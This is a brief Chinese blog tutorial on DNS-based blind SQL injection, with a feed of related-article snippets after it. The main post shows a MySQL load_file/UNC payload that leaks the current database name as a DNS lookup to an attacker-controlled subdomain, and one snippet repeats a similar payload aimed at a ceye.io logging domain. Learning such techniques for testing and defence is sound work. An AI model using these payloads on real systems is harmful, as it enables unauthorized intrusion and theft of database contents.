SQL注入之DNS盲注

最新推荐文章于 2023-02-09 13:58:32 发布
最新推荐文章于 2023-02-09 13:58:32 发布
阅读量322 收藏 2
点赞数
分类专栏: 安全入门 文章标签: mysql 安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SDM_JH/article/details/107630133
版权

一、准备一个自己的域名

  • 利用DNS进行sql盲注需要一个拥有可以修改dns权限的域名,然后需要在你的DNS服务器上把需要注入的域名委托到攻击机上,也就是当请求你域名中的子域的解析请求都会解析到攻击机,然后我们在攻击机监听53
    端口即可。

二、构造注入语句

  • 注入语句:http://域名/test.php?user=root' and load_file(concat('\\\\',(select database()),'添加的子域名\\aaa'))#
    可以利用sqlmap中的dns.py脚本监听53端口。最后在dns.py脚本的解析请求中即可看到注入内容。

三、绕过字符

在我们获取的数据中,如果包含字符,那么解析就可能出现错误,这时可以使用字符编码绕过,例如hex()函数,bin()函数等。

黎明的影
关注
专栏目录
26-3 SQL注入攻击 - SQL注入无回显,盲注又被封怎么办?
weixin_43263566的博客
03-11 610
UNC路径的格式类似于。基于时间的盲注可以通过构造特定的SQL语句来判断条件是否成立,从而推测出数据库中的数据。盲注速度较慢且容易被WAF或防火墙封禁IP,因此利用DNSlog可以快速有效地获取数据,避免IP被封锁的情况。通过以上步骤,可以利用 DNSLog 平台或自行部署DNSLog来获取命令执行的回显信息,这在某些情况下可能用于安全测试或网络监控等需要的场景。需要注意的是,DNS查询过程中涉及到本地DNS服务器、根DNS服务器以及顶级域名服务器等不同级别的DNS服务器,通过逐级查询最终完成域名解析。
SQL注入DNS_log注入
weixin_47785246的博客
07-11 881
SQL注入DNS_log注入 这篇文章将系统的讲解,SQL注入中的DNS_log注入的原理、方法、以及靶场练习writeup。 文章目录SQL注入DNS_log注入前言一、DNS_log注入原理二、靶场实战1.DNSlog 平台2.封神台靶场总结 前言 关于SQL注入的详细内容请看我之前写的文章 提示:以下是本篇文章正文内容,下面案例可供参考 一、DNS_log注入原理 我们都知道,DNS解析是一种用户访问域名时,客户端向DNS发起DNS查询的到目标服务器ip地址,进而实现通信的机制,而
dnslog盲注原理
rane的博客
03-18 1838
Dnslog盲注原理 布尔盲注和时间盲注相当于猜单词的游戏,我们需要对每一位逐步的猜测,效率很低,需要发送很多的请求进行判断,很可能会触发安全设备的防护 我们需要一种方式能够减少请求,直接回显数据——Dnslog注入 Dns在解析的时候会留下日志,通过读取多级域名的解析日志,获取请求信息 Dnslog盲注方法 登录http://ceye.io/网站并注册,得到属于自己的identifier 先尝试...
SQL注入学习-Dnslog盲注
笑花大王
02-17 697
1.基础知识 1.DNS DNS(Domain Name System,域名系统),因特网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串。通过主机名,最终得到该主机名对应的IP地址的过程叫做域名解析(或主机名解析)。DNS协议运行在UDP协议之上,使用端口号53。在RFC文档中RFC 2181对DNS有规范说明,RF...
SQL注入漏洞-利用DNS进行盲注
HacHunter的博客
03-23 528
在windows下面,可以通过网络路径(NUC)来访问其他主机的资源。其格式如下: \\servername\sharename,其中servername是服务器名。sharename是共享资源的名称。 其中servername可以是主机IP或者域名 当servername是域名的时候,会通过DNS 把域名把dns解析为IP地址。 DNS 服务器:win2003,IP:10.1.1.31添加一条主机记录baidu.com 10.1.1.31 子域名test 委托到10.1.1.251 We..
dnslog盲注
qq_50854662的博客
07-14 1094
dnslog盲注dnslog注入原理DNSlog工具什么情况下使用dnslog注入?Mysql DNSlog原理图DNSlog盲注利用条件DNSlog盲注操作方式实战演练查询当前数据库名:查询当前数据库的第一个表名:查询第users表一个列名:查询users表的username列的数据:需要注意的点: dnslog注入原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录 此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问
sql盲注进阶篇-dnslog盲注
十五年游戏主程转渗透之路
03-31 3551
dnslog注入
sql注入之布尔盲注、延时盲注以及原理
maluxiao123的博客
03-30 1254
之前已经简单介绍了sql注入的基本原理,接下来会按照sql注入的各种类型一一进行梳理,sql注入的常见主要分为回显注入、报错注入、bool盲注、延时注入、堆叠注入、二次注入、宽字节注入、http头注入、DNS LOAD注入。 1.布尔盲注 我们知道页面有回显可以确定回显位时可以进行回显注入,而没有回显的话,有sql报错页面可以使用报错注入,而一般设计完善的网站是会将sql报错的内容给屏蔽掉的。但是我们能判断页面是报错了,就算页面没有报错内容我们同样是有办法的,这时候我们可以使用盲注的方式来进行注入。 比如
第17天:WEB漏洞-SQL注入之二次,加解密,DNS等注入1
08-03
在网络安全领域,Web漏洞是常见的安全威胁之一,SQL注入是一种尤为危险的攻击方式。本文将深入探讨二次注入、加解密技术以及DNSlog注入的概念、原理,并通过具体案例和实际应用来阐述这些技术如何被利用。 **SQL...
SQL注入之利用DNS获取数据
Au
03-13 4025
1.SQL注入 SQL注入一般分为报错注入和盲注盲注的又分为布尔盲注和时间盲注。 当我们发现一个站点存在一个没有数据回显的注入点进行注入时,只能采取盲注,这种注入速度非常慢,需要一个一个字符猜解,而且很容易搞挂网站,这时候我们就需要寻找一种快速有效的方法来获取数据。 此时我们就可以利用DNS来快速的获取数据,当然我们也可以在无回显的命令执行或者无回显的SSRF中利用 特点:...
dnslog的sql注入
weixin_44894463的博客
07-09 250
前两天看到了一个骚姿势,没有回显的时候利用dnslog来得到数据库名等。 可以在一个网站上注册ceye.io,注册就可以得到一个二级域名。 用到了load_file() ,用法是load_file(文件名),比如这样:select load_file(concat(’\\’,database(),’.xxxx.ceye.io\fwafw’)); 这个就相当于访问了table_schema.xxx...
编解码注入、二次注入、DNSlog盲注
leekos的博客,分享web安全相关知识~
12-06 777
编解码、二次注入、DNSlog盲注
DNSlog注入姿势
qq_43681802的博客
02-08 850
DNSlog注入(mysql数据库sql注入姿势) 简介:本文记录sql注入中的注入姿势DNSlog注入原理及其构造payload过程 文章目录DNSlog注入(mysql数据库sql注入姿势)前言一、什么是DNS(域名系统)?二、DNSlog注入注入场景注入具备条件什么是UNC路径?1.注入原理2.注入过程总结 前言 DNSLOG注入不是一种新的sql注入方式,而是一种注入姿势。方便为我们进行sql注入提供方法 提示:以下是本篇文章正文内容,下面案例可供参考 一、什么是DNS(域名系统)? DN
sql盲注 解决_DNSLOG 盲注简单利用
weixin_29799175的博客
12-30 634
oxo1 前言众所周知盲注查询数据贼慢,利用 dnslog 就可以快速解决这个问题,但是利用条件也挺鸡肋的。具体原理请谷歌1、secure_file_priv 不能为 NULL2、支持 Windows,不支持 Linuxoxo2 工具http://ceye.io/ http://www.dnslog.cn/ BurpSuite:点击 Burp ,再点击 Burp Collaborator...
利用dns注入,快速获取数据,突破延迟盲注等速度限制
Jiajiajiang_的博客
12-04 3175
首先感受一下利用dns和不利用dns时的速度 这个是不使用dns,可以看左侧的时间,大概一分钟一条把,实际中这种还算是快的,并且是英文字符 我们再来看使用dns之后(真的不是缓存) 这是同一个库,使用dns之后,基本是秒速出数据了,速度对比非常明显, 然后我们看怎么操作 首先要拥有一个vps(就是一个IP),然后只要再拥有一个域名就可以了, IP买好以后就不用管了,我们来...
mysql dba盲注_SQL注入学习-Dnslog盲注
weixin_42311427的博客
01-27 133
1.基础知识1.DNSDNS(Domain Name System,域名系统),因特网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串。通过主机名,最终得到该主机名对应的IP地址的过程叫做域名解析(或主机名解析)。DNS协议运行在UDP协议之上,使用端口号53。在RFC文档中RFC 2181对DNS有规范说明,RFC 2136对...
SQL盲注加速方法总结
tpaer的博客
02-09 3362
SQL盲注加速方法二分法加速、.与运算加速、.二进制延时注入加速、dnslog OOB外带通信总结。
利用DNSlog进行sql盲注
weixin_44743506的博客
08-30 2237
一、原理 测试一些网站的时候,一些注入都是无回显的,手工盲注效率太低,我们可以写脚本来进行盲注,但有些网站会ban掉我们的ip,虽然可以通过设置ip代理池解决,但是盲注往往效率很低,所以产生了DNSlog注入。 首先有一个可以用于dns解析的域名,比如ceye.io。通过代理商设置域名ceye.io的nameserver为自己的服务器a,再在服务器a上配置好dns服务器,这样所有ceye.io...
SQL注入SQL盲注的区别
最新发布
04-07
SQL注入SQL盲注都是常见的安全漏洞,但它们有一些区别。 SQL注入是指攻击者通过在用户输入的数据中插入恶意的SQL代码,从而绕过应用程序的输入验证,进而执行非授权的数据库操作。攻击者可以通过SQL注入获取、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值